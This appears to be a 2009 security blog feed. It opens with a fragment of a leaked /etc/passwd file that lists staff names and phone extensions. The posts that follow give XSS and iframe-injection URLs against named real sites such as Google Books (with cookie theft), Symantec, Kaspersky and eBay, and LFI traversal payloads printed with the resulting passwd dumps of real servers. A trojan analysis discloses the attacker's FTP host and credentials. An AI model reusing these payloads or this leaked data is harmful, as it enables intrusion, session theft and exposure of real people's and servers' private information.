Engineering:/home/c_dikici:/bin/bash akcevik:x:10383:100:Abdulkadir Cevik,201,ext 2409,Civil Engineering:/home/akcevik:/bin/bash arif1:x:10277:100:Prof Arif Nacaroglu,,,:/home/arif1:/bin/bash ayilmaz:x:10142:100:Dr Mustafa Yilmaz,207,ext 2210,Engineering Physics:/home/ayilmaz:/bin/bash baykasoglu:x:10326:100:Dr Adil Baykasoglu,310,ext 2603,Industrial Engineering:/home/baykasoglu:/bin/bash beddall:x:1036:100:Dr Ayda Beddall,214/206,ext 2202/2206,Physics:/home/beddall:/bin/bash belibagli:x:10730:100:Dr.Bulent Belibagli,Food,,:/home/belibagli:/bin/bash bingul:x:10046:100:Ahmet Bingul,1/1,2200,Physics:/home/bingul:/bin/bash eakay:x:11033:100:Ogr.Gor.Ersin Akay,iibf,4290,:/home/eakay:/bin/bash erklig:x:1020:100:Ahmet Erklig,313,ext 2524/2513,Mechanical Engineering:/home/erklig:/bin/bash genseksek:x:11126:100:Genel Sekreterlik,idari,,:/home/genseksek:/bin/bash gonul:x:10176:100:Prof. Bulent Gonul,Physics,,:/home/gonul:/bin/bash avsar:x:1216:100:Ilker Ibrahim Avsar,MYO,4752,:/home/avsar:/bin/bash inal:x:11139:100:Uzman Oguz Inal,myo,1700,:/home/inal:/bin/bash kanber:x:10303:100:Dr Bahattin Kanber,209,ext 2577,Mechanical Engineering:/home/kanber:/bin/bash kutuk:x:10328:100:M.Akif KUTUK,316,ext 2571,Mechanical Engineering:/home/kutuk:/bin/bash mahsereci:x:11140:100:Ogr.Gor.Esra Mahsereci,myo,1700,:/home/mahsereci:/bin/bash mtgogus:x:10297:100:Mehmet Tolga Gogus,Z06,ext 2425,Civil Engineering Dept.:/home/mtgogus:/bin/bash nnacar:x:10147:100:Nuri Nacar,BIM,1950,:/home/nnacar:/bin/bash oduncuoglu:x:10056:100:Murat Oduncuoglu,Physics,,:/home/oduncuoglu:/bin/bash erkmen:x:10018:100:Prof. Osman ERKMEN,313/235,ext 2313/2335,Food Engineering:/home/erkmen:/bin/bash ozer:x:10053:100:Dr Okan Ozer,2/2,ext 2218,Engineering of Physics:/home/ozer:/bin/bash parlakyigit:x:10785:100:Ars. Gor. Pinar Parlakyigit,,,Textile Engineering,,:/home/parlakyigit:/bin/bash sibanoglu:x:10363:100:Dr Senol Ibanoglu,315,ext 2315,Food Eng.:/home/sibanoglu:/bin/bash sonercan:x:10573:100:Bilg.Isl.Mehmet Sonercan,Bim,1567,:/home/sonercan:/bin/bash taysi:x:10263:100:Ar�.G�r.Nildem Tay�i,110,ext 2422,Civil Engineering:/home/taysi:/bin/bash tuluce:x:11096:100:Ars.Gor.Hatice Kubra,Teng,,:/home/tuluce:/bin/bash varisoglu:x:10742:100:Ogr.Gor.Mehmet Celal

Rapowder.ch

Tue, 7 Apr 2009 15:57:29 GMT

Code:

http://www.rapowder.ch/www/frame.php?title=Links%20Admin&url=http://nemesis.te-home.net/Forum/

Metasploit Decloaking Engine and TOR

Tue, 7 Apr 2009 16:43:40 GMT

For those who don't know what TOR is, visit project's homepage: https://www.torproject.org

https://www.torproject.org/ wrote:

Tor is free software and an open network that helps you defend against a form of network surveillance that threatens personal freedom and privacy, confidential business activities and relationships, and state security known as traffic analysis.

Tor protects you by bouncing your communications around a distributed network of relays run by volunteers all around the world: it prevents somebody watching your Internet connection from learning what sites you visit, and it prevents the sites you visit from learning your physical location. Tor works with many of your existing applications, including web browsers, instant messaging clients, remote login, and other applications based on the TCP protocol.

Hundreds of thousands of people around the world use Tor for a wide variety of reasons: journalists and bloggers, human rights workers, law enforcement officers, soldiers, corporations, citizens of repressive regimes, and just ordinary citizens. See the Who Uses Tor? page for examples of typical Tor users. See the overview page for a more detailed explanation of what Tor does, and why this diversity of users is important.

Tor doesn't magically encrypt all of your Internet activities, though. You should understand what Tor does and does not do for you.

There are a lot of known attacks against TOR users to find their real IP, most of them rely on the fact that javascript, vbscript, plugins, etc. are not restricted by browser's settings so they can be used to bypass proxy restrictions or to reveal the local IP. Metasploit Decloaking Engine is a public service that can be called by websites to reveal the real IP of their users.

http://decloak.net/ wrote:

Metasploit Decloaking Engine

This tool demonstrates a system for identifying the real IP address of a web user, regardless of proxy settings, using a combination of client-side technologies and custom services. No vulnerabilities are exploited by this tool. A properly configured Tor setup should not result in any identifying information being exposed.

It is now possible to embed the decloaking engine into third-party web sites, using the services hosted at decloak.net. This is a great way to track down abusive users or verify the privacy settings of your site's visitors.

        Testing this service with a proxy set in browser and javascript and plugins enabled shows that it indeed can reveal your real IP. Disabling browser extensions and scripting reduces the functionality of most websites and/or makes them inaccessible. What can be done to reduce the risk of a website finding your real IP using one of these techniques if you use a proxy ?

        Advanced TOR is a new project which will be added here in the next days. It is based on TOR and its purpose is to make TOR more accessible and more resource friendly for Windows users without the need for an external program or an extra configuration port open to control its behaviour. Also, for some applications that don't have support for using proxies it can "force" them to use TOR. With the original Vidalia+TOR+Privoxy bundle you have 3 opened ports (9050 - socks4/5, 9051 - control port, 8118 - HTTP proxy port). With Advanced TOR you have only 1 port open (default is 9050 - 127.0.0.1:9050 ) which can be used for Socks5 , Socks4 and HTTP / HTTP CONNECT proxy. It has a GUI so there is no need for an extra configuration port (it can still be opened if needed).
        The "Force TOR" option can also be used with a browser that already uses TOR as proxy, to force scripts and extensions to use TOR. Testing Metasploit Decloaking Engine with TOR set as proxy and with "Force TOR" set for browser's process has the following result:

Advanced TOR wrote:

[06:59:39] [notice] Tor v0.2.1.13-alpha. This is experimental software. Do not rely on it for strong anonymity. (Running on Windows XP Service Pack 2 [workstation] {terminal services, single user})
[06:59:42] [notice] We now have enough directory information to build circuits.
[06:59:42] [notice] Bootstrapped 80%: Connecting to the Tor network.
[06:59:42] [notice] Bootstrapped 85%: Finishing handshake with first hop.
[06:59:45] [notice] Bootstrapped 90%: Establishing a Tor circuit.
[06:59:50] [notice] Tor has successfully opened a circuit. Looks like client functionality is working.
[06:59:50] [notice] Bootstrapped 100%: Connected to TOR network..
[06:59:51] [proxy] Connection request for decloak.net:80 .
[06:59:53] [proxy] Connection request for decloak.net:80 .
[06:59:53] [proxy] Connection request for decloak.net:80 .
[06:59:53] [proxy] Connection request for decloak.net:80 .
[06:59:55] [proxy] Connection request for decloak.net:80 .
[07:00:00] [proxy] Connection request for decloak.net:80 .
[07:00:00] [proxy] Connection request for decloak.net:80 .
[07:00:04] [proxy] Connection request for decloak.net:80 .
[07:00:06] [proxy] Connection request for decloak.net:80 .
[07:00:06] [proxy] Connection request for decloak.net:80 .
[07:00:06] [proxy] Connection request for decloak.net:80 .
[07:00:07] [proxy] Connection request for decloak.net:80 .
[07:00:08] [proxy] Connection request for fdcce6def5973cfe6316c165782e2e9f.http.85.25.145.98.0.0.0.0.spy.decloak.net:80 .
[07:00:09] [proxy] Connection request for decloak.net:80 .
[07:00:09] [proxy] Connection request for decloak.net:80 .
[07:00:11] [proxy] Connection request for fdcce6def5973cfe6316c165782e2e9f.quicktime.85.25.145.98.0.0.0.0.spy.decloak.net:80 .
[07:00:14] [proxy] Connection request for decloak.net:80 .
[07:00:16] [proxy] Connection request for decloak.net:80 .
[07:00:17] [proxy] Attempt to bypass proxy settings with address  66.240.213.71:843 .
[07:00:17] [proxy] Connection request for 66.240.213.71:843 .
[07:00:19] [proxy] Connection request for decloak.net:80 .
[07:00:19] [proxy] Connection request for decloak.net:80 .
[07:00:19] [proxy] Connection request for decloak.net:80 .
[07:00:19] [proxy] Connection request for decloak.net:80 .
[07:00:20] [proxy] Attempt to bypass proxy settings with address  66.240.213.71:53530 .
[07:00:20] [proxy] Connection request for 66.240.213.71:53530 .
[07:00:21] [proxy] Connection request for decloak.net:80 .
[07:00:23] [proxy] Connection request for decloak.net:80 .
[07:00:24] [proxy] Connection request for decloak.net:80 .
[07:00:24] [proxy] Connection request for decloak.net:80 .
[07:00:24] [proxy] Connection request for decloak.net:80 .
[07:00:26] [proxy] Connection request for 728c11eaf8a985be011aa3739598b520.http.85.25.145.98.0.0.0.0.spy.decloak.net:80 .
[07:00:35] [proxy] Connection request for decloak.net:80 .
[07:00:35] [proxy] Connection request for decloak.net:80 .
[07:00:35] [proxy] Connection request for decloak.net:80 .
[07:00:35] [proxy] Connection request for decloak.net:80 .
[07:00:38] [proxy] Connection request for 728c11eaf8a985be011aa3739598b520.quicktime.85.25.145.98.0.0.0.0.spy.decloak.net:80 .
[07:00:48] [proxy] Attempt to bypass proxy settings with address  66.240.213.71:843 .
[07:00:48] [proxy] Connection request for 66.240.213.71:843 .
[07:00:49] [proxy] Attempt to bypass proxy settings with address  66.240.213.71:53530 .
[07:00:49] [proxy] Connection request for 66.240.213.71:53530 .
[07:00:52] [proxy] Attempt to bypass proxy settings with address  66.240.213.71:53530 .
[07:00:52] [proxy] Connection request for 66.240.213.71:53530 .
[07:01:05] [proxy] Connection request for decloak.net:80 .
[07:01:07] [proxy] Connection request for decloak.net:80 .
[07:01:07] [proxy] Connection request for decloak.net:80 .
[07:01:07] [proxy] Connection request for decloak.net:80 .
[07:01:07] [proxy] Connection request for decloak.net:80 .
[07:01:09] [proxy] Connection request for decloak.net:80 .
[07:01:28] [proxy] Connection request for decloak.net:80 .
[07:01:31] [proxy] Connection request for decloak.net:80 .
[07:01:32] [proxy] Connection request for decloak.net:80 .
[07:01:33] [proxy] Connection request for decloak.net:80 .
[07:01:33] [proxy] Connection request for decloak.net:80 .
[07:01:33] [proxy] Connection request for decloak.net:80 .
[07:01:33] [proxy] Connection request for decloak.net:80 .
[07:01:33] [proxy] Connection request for decloak.net:80 .
[07:01:33] [proxy] Connection request for decloak.net:80 .
[07:01:33] [proxy] Connection request for decloak.net:80 .
[07:01:33] [proxy] Connection request for decloak.net:80 .
[07:01:33] [proxy] Connection request for decloak.net:80 .
[07:01:33] [proxy] Connection request for decloak.net:80 .
[07:01:33] [proxy] Connection request for decloak.net:80 .

The "Force TOR" option needs AdvTor.dll which sets hooks on Winsock functions gethostname - which always returns a fake hostname to prevent the program from finding local IP , connect and WSAConnect which will make the connections use TOR's proxy. Current version of AdvTor.dll works with Windows 2000 and XP, and doesn't work with programs that use WSAAsyncSelect. On request, more OS'es will be supported, and maybe its functions will be added to ddosflt to be able to force also services and svchost'ed services to use TOR.
The project is currently in beta, and it will be added on this website when enough options are added to GUI to make it usefull without editing configuration files (which are located in TOR's directory). For those who want to test what has been done so far, a beta version is available here: http://nemesis.te-home.net/Files/AdvTor/AdvTor.zip.

MaxMind.com - XSS

Tue, 7 Apr 2009 18:19:49 GMT

Code:

http://www.maxmind.com/app/locate_ip?ips=">

New Cross site Scripting Vulnerability on kaspersky

Thu, 9 Apr 2009 12:39:00 GMT

This time on Russian Support http://support.kaspersky.ru

Works fine on Firefox,Opera and IE.

XSS

Code:

http://support.kaspersky.ru/virlab/helpdesk.html?LANG=pl}">

Iframe Url Injection

Code:

http://support.kaspersky.ru/virlab/helpdesk.html?LANG=pl}">

And Just For Fun with Mr. Eugene Kaspersy =))

More about Kaspersky Bugs

http://nemesis.te-home.net/Forum/3100_Bad_Settings/20090320_Kaspersky_Returns.html

http://nemesis.te-home.net/Forum/3100_Bad_Settings/20090320_Other_Bad_Security_Settings_on_Kaspersky_s_Website.html

http://nemesis.te-home.net/News/Kaspersky_still_Insecure.html

Symantec Website Open to XSS Vulnerability

Wed, 15 Apr 2009 17:32:33 GMT

Critical cross site scripting bug was found on Symantec.com http://www.symantec.com

Simple XSS alert

Code:

http://www.symantec.com/connect/search-connect?page=8&terms=">

Document Cookie

Code:

http://www.symantec.com/connect/search-connect?page=8&terms=virus&community_id=&utility_id=">

Iframe URL injection

Code:

http://www.symantec.com/connect/search-connect?page=8&terms=">

Secure Symantec Staff has been alerted about the issue.

Avanced TOR (Windows only)

Fri, 17 Apr 2009 18:02:18 GMT

        New project added: Advanced TOR, an improved alternative for Tor+Vidalia+Privoxy bundle for Windows users.

        Some of the new features added to Advanced TOR include support for HTTP/HTTPS proxy on same Socks4/Socks5 port, a User Iterface which makes all Tor available options more accessible, local banlist for forbidden addresses and the ability to "force" a program and its extensions / plugins to use the Tor proxy regardless of its configured proxy settings. More features will be added in next versions.
        Project links:

DCinfo.org - XSS

Sat, 18 Apr 2009 14:28:19 GMT

the ultimate dc hublist :))

http://www.dcinfo.org/hublist.php?sort=hubname&st="> [/URL]

Code:

http://www.dcinfo.org/hublist.php?sort=hubname&st=">&popup=true

Spanish Ebay Vulnerable to XSS

Mon, 20 Apr 2009 10:02:53 GMT

Another Critical vulnerability was found on Ebay website ,so malicious phishers can use the these XSS vulnerabilities to spread malware and steal personal sensitive information.

Simple XSS alert

Iframe url injection

Document cookie

Also redirect works fine

Some others bugs on ebay http://nemesis.te-home.net/News/20090403_Multiple_Bugs_On_EBAY_CO_UK_Website.html

Updates and fixes on QSDChublist.com

Wed, 22 Apr 2009 18:10:42 GMT

Website updates:

Added: Totalshare in hubdetails
Removed: Xss bug in the language system reported by Methodman

Pinger updates:

Added: Calculation of totalshare
Added: Supernova detection and reporting. (Thx to Lord_Zero)

Project website: www.QSDCHublist.com

Theregister.co.uk - XSS

Wed, 22 Apr 2009 19:20:06 GMT

I think this is the first XSS bug found on theregister.co.uk website. Anyway, the webmaster has been alerted and now everything is fine

So now I can show some screens :)

Netcraft Vulnerable to XSS

Thu, 23 Apr 2009 09:10:49 GMT

Anti Phishing Firm Vulnerable to Phishing

http://news.netcraft.com/about-netcraft

Code:

http://searchdns.netcraft.com/?host=google'">>

XSS by teamelite

Code:

http://searchdns.netcraft.com/?host=google'">'">

">/h1>

webmaster has been alerted... xss bug was fixed but still any response ... anyway .. maybe next time :)

technewsworld.com - xss

Sat, 25 Apr 2009 14:52:42 GMT

Code:

http://www.technewsworld.com/perl/search.pl?&query=F-Secure&init=60">

New XSS Bug on Yahoo

Tue, 28 Apr 2009 09:32:37 GMT

Buzz yahoo Vulnerable to xss attack

Code:

http://buzz.yahoo.com/article/1:cnet_news406:91557c7e67c73cf69b8d944106082074/F-Secure-says-stop-using-Adobe-Acrobat-Reader?action=share&sharedasset=article%2F1:cnet_news406:91557c7e67c73cf69b8d944106082074'">>

XSS-BY-Methodman

Screen:

Critical XSS bug in Google Book Search

Tue, 28 Apr 2009 20:08:32 GMT

Google has many services and all of them use same credentials. This carries a high risk for all users because a bug in one of their services affects them all. Security researcher Pierre Gardenat has found an interesting XSS bug in Google Book Search:

Pierre_gardenat wrote:

Critical XSS vulnerability in Google book search service :
PoC :

Code:

http://www.google.com/books?q=%22%27/%3E%3Cscript%3Ealert(String.fromCharCode(72,69,76,76,79,32,80,73,69,82,82,69))%3C/script%3E

This vulnerability can be used to display sensitive information :

Code:

http://www.google.com/books?q=%22%27/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

And can be combined with Google SSO to launch phishing attacks :

Code:

https://www.google.com/accounts/Login?service=print&continue=http://www.google.com/books%3Fq%3D%2522%27/%253E%253Cscript%253Ealert(document.cookie)%253C/script%253E%26hl%3Dfr&hl=fr

Of course, you can also inject external frames and play with DOM content under certain conditions :

Code:

http://www.google.com/books?q=%22%3Ciframe%20src=index.htm

Google has fixed this flaw now.

To learn more about XSS attacks, the risks associated with them and their evolution, follow Pierre Gardenat's presentation at SSTIC 09 French Conference - Rennes 3,4 and 5th June 2009 (http://www.sstic.org/SSTIC09/info.do).

Hidden installers and "Server 89.exe"

Thu, 30 Apr 2009 20:06:27 GMT

Lately we've seen a new trojan being spammed on various blogs and forums (spammer's last known IP: 204.2.134.13) or shared as "releases" on file sharing websites. Most infected files are NSIS installers that silently extract and execute 2 files, one of them is "Server 89.exe" and the other may be a shareware program or a key generator, a freeware program or a WinRAR self-extracting archive that extracts a document, avi or mp3 (as in "filename.avi.exe"). NSIS installers can be extracted without executing them using a freeware archiver like 7Zip.

Server 89.exe is a trojan that saves all locally stored password to a file called u16event.dat in Temp directory, sends the file to a ftp and deletes itself (cmd /c timeout 5 && del "Server 89.exe"). The "encryption" method used for strings found in trojan executable is simple - string[i]^=i%5; , all strings preceeded by a character with code 1. The passwords for Msn Messenger, Google Talk, Trillian, Yahoo Messenger, Aim Messenger, Pidgin Chat Client, Steam, No-Ip Duc, DynDns Updater, Firefox 2 / 3 stored passwords, Internet Explorer 7 / 8 stored passwords and FileZilla's stored passwords are saved as a HTML formatted table, having these columns: Program , Protocol / Url , Username and Password.

Code:

Program

Protocol / Url

Username

Password

The HTML table with all passwords is then sent to ftp://89.248.160.215 (sv4.altushost.com) where the trojan uploads the file using this account: hellokon@idownloader.net , password 0321287975703333009705 (http://www.idownloader.net is on same host).
As antiviruses add detection for this trojan, new versions are made to avoid detection, all of them upload to the same host using same account.
Do not execute any downloaded executable file without scanning it with an antivirus. We recommend you to send suspicious files to a service like http://www.virustotal.com which uses more antivirus engines to scan a file and all files are sent to antivirus companies to improve detection.

Multiple Bugs on McAfee Websites

Fri, 1 May 2009 12:00:14 GMT

I think it's not so easy :)

Server XMLHTTP post request errors

Code:

http://www.mcafee.com/us/about/antipiracy_'

Code:

http://www.mcafee.com/us/enterprise/solutions/network_access_'

Code:

http://www.mcafee.com/us/security_'

Quote:

msxml3.dll error '80004005'

A string literal was not closed. redirect[@org='www.mcafee.com/us/enterprise/solutions/network_access_'-->']<--

/error-pages/cls_redirect_lib.asp, line 67

Iframe Injection

Code:

https://kc.mcafee.com

Code:

https://kc.mcafee.com/corporate/index?page=answers&type=search&searchid=1240943327683&question_box="

XSS and Iframe Injection

Code:

http://www.mcafeerebates.com

On the same website - http://www.mcafeerebates.com/promocenter/mcafee/promo_search.html - redirect also works fine

Example: - try to put something like this:

Code:

in Date Purchased or Rebate Offer Number/Promotion Code: and then click Continue.

You will be redirected to our website :)

MPAA Website Vulnerable to XSS

Sat, 2 May 2009 20:32:15 GMT

MPAA's website was found vulnerable to XSS. Vulnerable page: http://mpaa.org/thank_you.asp.

A screenshot to remember (for next year's April 1st) :

This vulnerability can be called from any website that has the following code:

Code:

WARNING: This is a proof of concept that proves an XSS on mpaa.org website and should be taken as a joke.
<IMG src='http://static.thepiratebay.org/img/tpb.jpg'><BR><BR><IFRAME width='100%' height='600px' src='http://thepiratebay.org/browse/200'>

Bugs in RIAA.com Website

Mon, 4 May 2009 09:36:30 GMT

Full path disclosure: http://www.riaa.com/email.php
Unprotected directory: http://www.riaa.com/classes/
XSS: http://www.riaa.com/search.php
Example for search string: \'>:

Code:

WARNING: This is a proof of concept that proves an XSS on riaa.com website and should be taken as a joke.

Securitydot website Infected with Trojan Downloader

Mon, 4 May 2009 22:37:12 GMT

Quote:
SecurityDot is one of the most comprehensive and trusted source of security information on the Internet.

http://securitydot.net/about.php

Report from Kaspersky Antivirus
Quote:
04/05/2009 13.32 Rilevato: Trojan-Downloader.JS.LuckySploit.m Internet Explorer http://202.73.57.6/tomi/?t=2


Wepawet Report
Quote:
wepawet is a service for detecting and analyzing web-based malware.

Analysis report for
Code:
http://securitydot.net/index.php


http://wepawet.cs.ucsb.edu/view.php?hash=955727554381880de0b84cdc74200b87&t=1241433711&type=js

Analysis report for
Code:
http://202.73.57.6/tomi/?t=2

http://wepawet.cs.ucsb.edu/view.php?hash=126e867e49f9ce219122270f3125347b&t=1239907937&type=js

This resource appears to be involved in the Luckysploit malware campaign.

About LuckySploit http://novirusthanks.org/blog/2009/03/luckysploit-new-exploit-kit/

Quote:






Quote:
fuadrenal.com

202.73.57.6 = dyn6-b57-access.superdsl.com.sg

IP Location: Singapore  Singapore Web & Mail Hosting Company

The following websites were found on 202.73.57.6:

1qdwc0.davtraff.com
24cn39.davtraff.com
2a60wr.davtraff.com
57yq57.davtraff.com
5pwn36.davtraff.com
6hoxw7.davtraff.com
74ohfl.davtraff.com
77198r.davtraff.com
7ad12y.davtraff.com
8zlnmc.davtraff.com
9c72ea.davtraff.com
acu7r6.davtraff.com
albhz6.davtraff.com
b3a42u.davtraff.com
ckvw3z.davtraff.com
donkxy.davtraff.com
dq0cgg.davtraff.com
e0wrb0.davtraff.com
ec5l0i.davtraff.com
eibw7n.davtraff.com
enljz0.davtraff.com
fzmwuj.davtraff.com
g1o5eg.davtraff.com
g9c0fz.davtraff.com
gmn2c9.davtraff.com
jf41c2.davtraff.com
jjbjhr.davtraff.com
joz5ul.davtraff.com
k6evo9.davtraff.com
ke8m40.davtraff.com
lh18qs.davtraff.com
myoxfh.davtraff.com
np8fh0.davtraff.com
oj44aw.davtraff.com
p5uup0.davtraff.com
ptrb84.davtraff.com
qp485x.davtraff.com
ri0lms.davtraff.com
rla7d9.davtraff.com
s101wg.davtraff.com
srvd02.davtraff.com
toolnw.davtraff.com
ts9n6v.davtraff.com
tx7zs2.davtraff.com
u6wtp5.davtraff.com
vd0lkq.davtraff.com
vzjdcp.davtraff.com
w2wnl1.davtraff.com
wpy0go.davtraff.com
y7k6cn.davtraff.com
yahoo-analytics.net
ycf18f.davtraff.com
zhesky.davtraff.com

Total: 53 websites.

All websites serving malware,so be carefull if you try to enter

We have found also some bugs like Cross site scripting and Iframe injection

Vulnerable page:

Code:
http://securitydot.net/search.php?sch=sch&metaname=all&query=">

Screenshot of the Securitydot XSS and Iframe injection flaw

This vulnerability can be used to perform phishing attacks

Faking Movie Ratings

Tue, 5 May 2009 06:54:01 GMT
Some people say MPAA's movie rating system is useless, an inconvenience for independent distributors. A bug in their movie rating search websites makes it even more useless.
Affected websites (all hosted on same server as mpaa.org):
filmratings.com
filmratings.org
r-rated.net
r-rated.org
rated-nc-17.com
rated-nc-17.net
rated-nc17.com
rated-nc17.org
ratedr.org
www.filmratings.com
www.filmratings.org
www.movieratings.org

An XSS bug in all these websites allow "smart marketers" to fake the ratings of a movie or trojan spreaders to infect website visitors.
Vulnerable page (all sites): /content.asp

Example:
Search string for the movie "Twilight Zone" to get the rating "PG":
Code:
twilight zone
Search string for the movie "Twilight Zone" to get the rating "NC-17":
Code:
twilight zone" size="25">
Rating:

Total : 1
Title: Twilight Zone - The Movie (1983)
Rating: NC-17
Distributor: Warner Bros. Inc.

For bulk data exports or special requests, please contact WebHost@Mpaa.org
Visit the Parental Media Guide for parental advisory information for TV, Records, CD's and Computer, Video and Internet Games.
� 2000 The Classification and Rating Administration. All rights reserved. Privacy Policy
Site design by The Braverman Group

Total : 1
Title: Twilight Zone - The Movie (1983)
Rating: NC-17
Distributor: Warner Bros. Inc.



For bulk data exports or special requests, please contact WebHost@Mpaa.org
Visit the Parental Media Guide for parental advisory information for TV, Records, CDs and Computer, Video and Internet Games.
c 2000 The Classification and Rating Administration. All rights reserved. Privacy Policy
Site design by The Braverman Group
Rating:

Total : 1
Title: You Wouldn't Download a Car (1983)
Rating: G
Distributor: Musing And Film Industries of America



For bulk data exports or special requests, please contact WebHost@Mpaa.org
Visit the Parental Media Guide for parental advisory information for TV, Records, CDs and Computer, Video and Internet Games.
c 2000 The Classification and Rating Administration. All rights reserved. Privacy Policy
Site design by The Braverman Group
'>

nupecc.org - LFI

Tue, 5 May 2009 17:54:14 GMT

Code:
nupecc.org/index.php?display=../../../../../../etc/passwd%00

Quote:
root:x:0:0:root:/root:/bin/sh bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin pvm:x:24:24::/usr/share/pvm3:/bin/bash zope:x:475:475:Zope user:/usr/lib/zope:/bin/false apache:x:48:48:Apache:/var/www:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash gdm:x:42:42::/var/gdm:/sbin/nologin +::::::

Unionemollica.it - LFI

Tue, 5 May 2009 17:57:07 GMT

Code:
http://www.unionemollica.it/view.php?file=../../../../../../etc/passwd%00

Quote:
root:x:0:0:root:/root:/bin/bash daemon:x:2:2:daemon:/sbin:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin postgres:x:26:26:postgres:/srv/pgsql:/bin/bash mysql:x:27:27:mysql:/var/lib/mysql:/bin/bash rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin rpc:x:32:32:Portmapper RPC User:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin mailnull:x:47:47::/var/spool/mailqueue:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin emerge:x:70:70:Conary emerge build user:/var/conary/emerge:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin raa-web:x:91:91:rPath Appliance Agent:/var/lib/raa/:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin web:x:500:48:Web User Account:/srv/www/html:/usr/bin/scponly vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin

Alfa.hub.lv - LFI

Tue, 5 May 2009 18:14:06 GMT

Code:
http://alfa.hub.lv/vhcp_alfa/?page=../../../../../../etc/passwd%00

Quote:
# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ # root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5:System &:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin news:*:8:8:News Subsystem:/:/usr/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin _dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin omega:*:1004:1004:User &:/home/omega:/bin/sh eT:*:7777:0:User &:/home/eT:/usr/local/bin/bash mysql:*:7778:7778:User &:/usr/local/mysql/user:/usr/sbin/nologin alfa:*:1003:0:User &:/home/alfa:/bin/sh ftpuser:*:5500:5500:User &:/usr/local/ftp:/bin/sh squid:*:100:100:Squid caching-proxy pseudo user:/usr/local/squid:/usr/sbin/nologin

VerliAdmin- v0.3.7 - v0.3.8 -Multiple Cross-site Scripting Vulnerabilities

Wed, 6 May 2009 07:10:03 GMT

Code:
VerliAdmin-  v0.3.7 - v0.3.8 -Multiple Cross-site Scripting Vulnerabilities

http://bohyn.czechweb.cz

- 5-05-2009

- Methodman - http://nemesis.te-home.net

-Example:

http//:verliadmin.com/index.php?q=bantest&nick=">

http//:verliadmin.com/index.php?nick="'/>

http//:verliadmin.com/index.php?q="'/>

http//:verliadmin.com/index.php?"'/>

-Proof of Concept:

http://alfa.hub.lv/alfa/index.php?q=bantest&nick=">

http://alfa.hub.lv/alfa/index.php?nick="'/>

http://alfa.hub.lv/alfa/index.php?q="'/>

http://alfa.hub.lv/alfa/index.php?"'/>

/teamelite 2009

Mirror:

http://packetstormsecurity.org/filedesc/verliadmin-xss.txt.html

VerliHub Control Panel - v 1.7e XSS & Iframe Injection Vulnerability

Wed, 6 May 2009 08:10:23 GMT

Code:
VerliHub Control Panel  - v 1.7e  XSS & Iframe Injection Vulnerability

http://vhcp.verlihub-project.org

-6-05-2009

-Methodman - http://nemesis.te-home.net

-Example:-

Cross-site scripting vulnerability on login page

http://vhcp.com/index.php?page=login&nick=">

http://vhcp.com/index.php?page=login&nick=">

-Proof of Concept:-

